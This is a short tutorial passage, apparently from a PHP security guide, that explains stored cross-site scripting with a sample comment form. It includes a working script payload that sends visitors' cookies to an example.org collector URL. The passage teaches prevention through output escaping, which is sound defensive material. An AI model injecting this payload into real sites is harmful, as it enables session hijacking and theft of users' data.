Cross-site scripting (XSS) is one of the most common and best known kinds of attacks. The simplicity of this attack and the number of vulnerable applications in existence make it very attractive tomalicious users.
An XSS attack exploits the user’s trust in the application and is usually an effort to steal user information, such as cookies and other personally identifiable data. All applications that display input are at risk. Consider the following form, for example.
This form might exist on any of a number of popular community websites that exist today, and it allows a user to add a comment to another user’s profile. After submitting a comment, the page displays all of the comments that were previously submitted, so that everyone can view all of the comments left on the user’s profile.
<form method="POST" action="process.php"> <p>Add a comment:</p> <p><textarea name="comment"></textarea>& </p><p><input type="submit" /> </p> </form>Imagine that a malicious user submits a comment on someone`s profile that contains the following content:
<script> document.location = "http://example.org/getcookies.php?cookies=" + document.cookie; </script>Now, everyone visiting this user's profile will be redirected to the given URL and their cookies (including any personally identifiable information and login information) will be appended to the query string. The attacker can easily access the cookies with $_GET['cookies'] and store them for later use. This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping.